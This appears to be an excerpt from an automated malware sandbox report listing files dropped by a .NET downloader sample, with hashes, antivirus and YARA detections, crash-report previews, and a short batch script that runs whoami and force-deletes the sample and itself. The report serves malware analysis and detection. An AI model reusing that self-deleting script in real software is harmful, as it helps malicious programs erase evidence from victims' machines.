                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.7.6.9.9.1.0.2.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.1.6.3.1.6.1.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.3.f.e.5.a.2.-.8.1.9.1.-.4.6.4.a.-.8.e.6.3.-.e.0.0.e.b.3.8.6.a.5.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.4.a.b.4.9.1.-.f.2.0.7.-.4.f.f.f.-.a.e.f.c.-.f.0.9.1.8.6.0.6.c.b.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.f.4.-.0.0.0.1.-.0.0.1.4.-.7.7.2.d.-.e.a.0.e.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):1.3034050183915444
                          Encrypted:false
                          SSDEEP:192:VFdaIrV7t90yonekaWxJzGjlucGzuiF4Z24lO8WQ:X0E7Uyon5am98rGzuiF4Y4lO8WQ
                          MD5:C104DCEE50B43043A1E8268C0854C2FA
                          SHA1:FF855C5927B74B7B2BF7E90042FE07F5F8FE6D53
                          SHA-256:2A92CB533CE8F63D488A6FAAD93D4B1F3594BD03EA22173153E473E20B84AAA3
                          SHA-512:FC1953FD2CB1B3853603B5C355A91B3A8DB54FD3BD01BAE74E3E00874857136C87ADAD3E15685BCF4A1E3F809F5DB8AE30247B8114AC2A184B18713870E61FB7
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.6.3.5.1.4.3.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.7.9.3.7.8.7.0.7.0.1.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.7.9.f.0.9.3.7.-.9.3.d.4.-.4.d.e.0.-.9.4.0.c.-.f.a.0.2.8.8.d.e.6.9.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.d.3.9.f.6.-.6.7.4.4.-.4.4.1.3.-.a.8.1.9.-.9.6.6.5.b.1.0.9.e.f.e.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.v.r.r.e.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.p.i.d.g.i.n.s.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.7.0.-.0.0.0.1.-.0.0.1.4.-.2.4.c.d.-.1.9.0.2.f.f.c.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.5.2.b.f.2.0.c.c.d.c.a.5.a.2.4.a.8.0.a.5.9.b.3.e.c.6.f.8.b.a.1.0.0.0.0.0.0.0.0.!.0.0.0.0.a.3.5.0.f.7.4.0.3.f.2.5.a.d.d.2.9.a.4.6.4.4.9.1.d.3.7.f.5.6.b.5.3.8.1.d.4.a.7.3.!.s.v.r.r.e.v.e...e.x.e.....T.a.r.g.e.t.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8548
                          Entropy (8bit):3.691423304861039
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJqE1rc6Y9QdvgmfZp8rhIpDu89bkf6fSMm:R6lXJxy6YqdvgmfHLkif4
                          MD5:45679926B97B3A85ECA82F3ACD58084A
                          SHA1:93DF90DE704C08B75D0F068BEC2DDA06D36A0B00
                          SHA-256:BE402A5803DD2E50F8BD0E766C9BBE3B01C85AEEA54C3953C080A12FB2FFEC5B
                          SHA-512:499466EB933DCB22A40E92BFE2DE562D575B64AF147AB9F10374F247095940A3A390F0294B73DD7D676902C433212B4BB64F9CA5EA0AA8455339FB489B6731EC
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.2.4.<./.P.i.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4737
                          Entropy (8bit):4.413381394335846
                          Encrypted:false
                          SSDEEP:96:uIjfaI7keAHem7VoJAONFONIWLONFONuun2d:uI2YkeAHem7+AONFONXONFONuunM
                          MD5:58EFF0A3736EC5467F91A216EDBB7B0D
                          SHA1:B8A207596F3C48811C4900313838DB15F5ED2432
                          SHA-256:EF1B76CA20551C37275E85CD8BEFB737D8767BBBFF8C8EC6F3EF66FA327E0853
                          SHA-512:95E2B393B40D42F4A058FB652B98978A0ECC3504C92BAC8D96930FBE4F8BFE154C5B1E2D4A6AF7C629CB8D63826AC3C2928C4C0F9CAFB06B124709BEEA9FE253
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:21 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):276034
                          Entropy (8bit):3.736028492520922
                          Encrypted:false
                          SSDEEP:1536:Y3SNc67f9SFEyyJ5S2cXoYKZ9jCC8jH/iE5/mXh5+vMF6e3dM9+x5AdUNFA82bIi:nTwF9cSPXo51CCq6qQ3+vc6eHcF4cE+
                          MD5:975BD88D821E66A3855D56EE68C21B55
                          SHA1:07FE5853348A12F10B7315DDECD2397A060B8CE5
                          SHA-256:C61B5523A4D1089E5EFA18989BC0EC38757E7EC9B7B6A27B4A39534D46C40EE4
                          SHA-512:D11DC517C0B6D195B3F5E033F222E2AD7549A9B310F4CDA235CC904254F24160D8C200B7511735E9A15BD31861F94A11969FD89FDE2A3007A00B49598AA4AA1D
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... .......u.zf....................................$............................B..........l.......8...........T............ ..............,............ ..............................................................................eJ....... ......Lw......................T...........u.zf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8542
                          Entropy (8bit):3.6944195299706766
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJbeaE76Y9YdvgmfZp8rhIpDO89bkB5fSzMm:R6lXJiF6YCdvgmfHLkPfSt
                          MD5:20547D5D08D588B3258EA7A7CC863158
                          SHA1:E7DD0DCEE5F78F666DF351674E40119F857CAD1B
                          SHA-256:473AC994782D3C88E825B38CA8DB92AE98CE84415C1EEA3ECA53CABEE318324D
                          SHA-512:E9E49ABF320E84B2E4FE1E45FA292361EF90EFDE058DE16F09E981F46B3F6087E0545E381F9AB8F507642E53175FD3D2F7A3BF0E469FF81778A9C9AE9F89965D
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.6.<./.P.i.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4737
                          Entropy (8bit):4.413408306953291
                          Encrypted:false
                          SSDEEP:96:uIjfaI7keAHem7VHJAONFONEfWLONFON1Wunld:uI2YkeAHem7rAONFONEGONFONQun7
                          MD5:F9595DBBFD1C43A1F929B963BCE3DAF3
                          SHA1:29C2F7D4636766BC413BD78A40AA5014790536B5
                          SHA-256:2D0619E3304C059F5753363367A082A1D53FB2CBB4E71B1270D395C4D6F2966E
                          SHA-512:081A24E7F236905C12611F4B866A96EAA4B4A5CD54E8591E1A64535AEAAEFFE815BFEAA3F8F7A8EB959AE388FAEC1E786754EBFC21143F607F1780CE92CF7B7B
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:26 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):617636
                          Entropy (8bit):3.142923694274219
                          Encrypted:false
                          SSDEEP:3072:v8MG9s5U4sPtF1cSonOFhk1CCqh3RW3+vqMPy+FcwHRANoVmfyBOXpIymdSZA6yR:v89ORqhhW3QtqAZzpshCv/
                          MD5:FDB7A5064DC9DD06E34F37BCA7EE0A24
                          SHA1:AF94BA9CDEB401F54C015D6B99C38BECB8783E79
                          SHA-256:4AF420FF9343DFC5C6FF5D18B8BF65987BFAD6B417F520221DFC69789815BB1A
                          SHA-512:4ED1BFAF42D4BF5D7883C10435942A0E9BDA9F5EB2328B7B03FC225984465E7B8C0B4D7DA8089721C4A9DA64F44E3E876C5E4FAF93FF14B8C1554FCB1E7249E9
                          Malicious:false
                          Preview:MDMP..a..... .......z.zf............$...........t#..D.......<.......................tP..x...........l.......8...........T...........x`..,............C...........E..............................................................................eJ.......F......Lw......................T.......p...W.zf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6824
                          Entropy (8bit):3.7247199651382066
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJdyTRYZHPKpry89b7ylBMf6zpm:R6lXJYFYJE7yl6f6A
                          MD5:E769EE8BC7A423BBCCCD831B7BE74712
                          SHA1:DB4F8FBB48E6C5F9067C95548D73871B6D60F248
                          SHA-256:2BC6CB8C7B271B1CBE223173892102E59629DCE39C34BB48FA698D8F021BD074
                          SHA-512:7909F5F03760378A86FDA121FB3F86244AC9793F273E4DF053EB1390D59ADE6C3424A6B610896F18C1AE0336E8AE2AC8BAFB7FC60A4F9D13A2F8E3B1B2BF45BB
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.3.6.<./.P.i.
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4779
                          Entropy (8bit):4.44202668290334
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zscJg771I9zeAHeXWpW8VYjYm8M4JAolNN48F+byq8vLolNN4y6FBnSd:uIjfaI7keAHem7VrJAONydWLONyyunSd
                          MD5:6FEBC99F2B96E6A5A81F0C7DDDFB25E6
                          SHA1:E42F4D262C3E669142D8365C82205E7AD5C8DEF8
                          SHA-256:7E026D3531F422E1319992A27B47B52A4ED933EA592582C271EC62B6A3CA62E3
                          SHA-512:D4DC54A7B5AC4F9AC086AE628A054E2F0101C02893FE8A54AD9C3912C54515A55A09897293F4384AF0A98555A1BC8EC95677A11864D0706926EF75849BA25518
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="383279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:Mini DuMP crash report, 16 streams, Tue Jun 25 12:56:21 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):275778
                          Entropy (8bit):3.7419304342243453
                          Encrypted:false
                          SSDEEP:1536:fAzqUf9SFSyyJ5S219UcyZ9jCC8jH/imZemXh5+vM6FsxPHFP3dDoiKzx5AdZnej:fAmVFPcSgU91CCq64D3+vXIlPqbi4HSA
                          MD5:6BC41B54862FD5E33AEB9769C7635575
                          SHA1:28C239B5C61A29968AF95CE3415BB4370D53E8F3
                          SHA-256:C7F73F4F03F2FD7C71DCE9AEA40260BA786F8DAF285D15FB93DA233603E6504D
                          SHA-512:5F1E5834C759AA2FFC4D774EF76F307F9C5D90A5CACD8B460921B26603275230A25AA63BDACFF3298FED4647F4BE7EC508DDB6395D224D3B35F651CA516F3E08
                          Malicious:false
                          Preview:MDMP..a..... .......u.zf....................................$............................B..........l.......8...........T............ ..............,............ ..............................................................................eJ....... ......Lw......................T...........m.zf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):1972736
                          Entropy (8bit):6.157411768979153
                          Encrypted:false
                          SSDEEP:24576:Bp9JSZzPtEAPq07VFEJPPwLQk5V4yHEpfm:BpnSjEaRCVwd5Cykp
                          MD5:7DDECCF7C147EA2B90426AEB43277096
                          SHA1:A350F7403F25ADD29A464491D37F56B5381D4A73
                          SHA-256:F8880A50A9423AFAC856607F3A7A9759CE580FD71E8D92D480E6EC32A52378CB
                          SHA-512:2B0F23FDC66CFE90C329474669109320694107F140E5D3B95338833211B4C6FA58A627583BABD256FB045444F609020CE544C2A3C14E5D85C46EE76BC71CA7AF
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\uovan\svrreve.exe, Author: Joe Security
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 45%
                          • Antivirus: Virustotal, Detection: 56%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x"................0..l..........>.... ........@.. ....................................`....................................W.......H....................`....................................................... ............... ..H............text...Dj... ...l.................. ..`.rsrc...H............n..............@..@.reloc.......`......................@..B................ .......H.......h/..|Z....../....e..h...........................................A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z.a.b.c.d.e.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.0.1.2.3.4.5.6.7.8.9.-._..(u...*".("....*b.@.C...%.....(#........*Z.~.........s%........*.s.........*.(.....*^..}.....(_.......}....*.s.........*..*F......(K........*6.{"....o....*^.{#....o....o....o....*.s:....$...*".o.....*.*&.(".....*".......*b.@.C...%.....(#........*...(.........~....r...p(E........*
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:CSV text
                          Category:modified
                          Size (bytes):1492
                          Entropy (8bit):5.3787668257697945
                          Encrypted:false
                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhwE4k/1qE4GIs0E4KGAE4KKUNKKIE4TKBGKoM:MxHKQwYHKGSI6owH81qHGIs0HKGAHKKe
                          MD5:F275D52AB9901AC1E084FE432BE68AD1
                          SHA1:A05C42D898E8AC22C6F1B65B4DC04FD738E9963B
                          SHA-256:45BF2F8850914B408EB93C38835A4D5BCC92A311550C09E6D9E66CC1DB86557C
                          SHA-512:6622EA7B8E197C7F2E46A32F85C91E4AC49C8CAE453BBF55216BAFE1D84ADE208C3511545CBA8C62FD6B87B64D05C90FBB082F6B0D956576FD9FFBC214163C21
                          Malicious:true
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4b68470ad08185826d827aa6e7875b6\System.Net.Http.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.F
                          Process:C:\Users\user\Desktop\ubes6SC7Vd.exe
                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):159
                          Entropy (8bit):5.081361448502054
                          Encrypted:false
                          SSDEEP:3:mKDDCMNuwGv1h8mRDt+WfHvhs9Qg3JwDwU1hGDt+kiE2J5xAInTRIJKcIh1ZPy:hWKuZNOm1wQO9Qg3+DNewkn23fTNcW1k
                          MD5:9B3397E61B11AB36E9AACC7DE0DAF91C
                          SHA1:11165F9206D257834B54B0D05485E90FAC98CB56
                          SHA-256:98FD837717A5A22C361DBAE6B6EBEE89253C2C093D6C2D85149415CCE8D544D2
                          SHA-512:4447DFDCAFCE70A9D01814D411A73047F57E7E4B5769D39C4210776E2873C222BACF70113037300F5D79F47D1B33D5AC146AAD472CBDA4E53422E47C378328BB
                          Malicious:false
                          Preview:@echo off..timeout 7 > NUL..whoami..CD C:\Users\user\Desktop..DEL "ubes6SC7Vd.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpFD97.tmp.bat" /f /q..
                          Process:C:\Windows\System32\WerFault.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465651773317116
                          Encrypted:false
                          SSDEEP:6144:zIXfpi67eLPU9skLmb0b4KWSPKaJG8nAgejZMMhA2gX4WABl0uNIdwBCswSb7:kXD94KWlLZMM6YFH++7
                          MD5:F0F54A59E74C2C733845737D561B70D7
                          SHA1:DF0BE581EA1946223936BA12CE1EB364247D0834
                          SHA-256:994A46D34E8F053F44679516C3E534111CC2D8C45B62B5DFC1F193EC7C66815E
                          SHA-512:B468248F08AA85D1FE7A6386C935CB1B8029A056A62E7A990498C84486BFC83074AEDB070C26B32737A422272B87FDC3108D996DA277667ED6C4976A4121C83F
                          Malicious:false
                          Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....................................................................................................................................................................................................................................................................................................................................................OY."........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\timeout.exe
                          File Type:ASCII text, with CRLF line terminators, with overstriking
                          Category:dropped
                          Size (bytes):68
                          Entropy (8bit):4.551500018105127
                          Encrypted:false
                          SSDEEP:3:hYFxjZAR+mQRKVxLZTtcyn:hYFxaNZzn
                          MD5:C2690662A62F73771FDAFC602E8A707F
                          SHA1:C4B4AAA76D45FDEBCCA874D1307978D3520FDD9B
                          SHA-256:BEE86C0B0D8CEC1FE391CF8284CF6262BF2D8E97715C18CEF19BA62532E9AAAC
                          SHA-512:0CE9350E3B962098058B819F08A9A293DCECD19114BAB5E04623A826DA0407C927F49C0AEE76A46331A258AC86AB2463E84BCE4C5C5813E70663D5618B80D7F4
                          Malicious:false
                          Preview:..Waiting for 7 seconds, press a key to continue ....6.5.4.3.2.1.0..
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):6.157411768979153
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
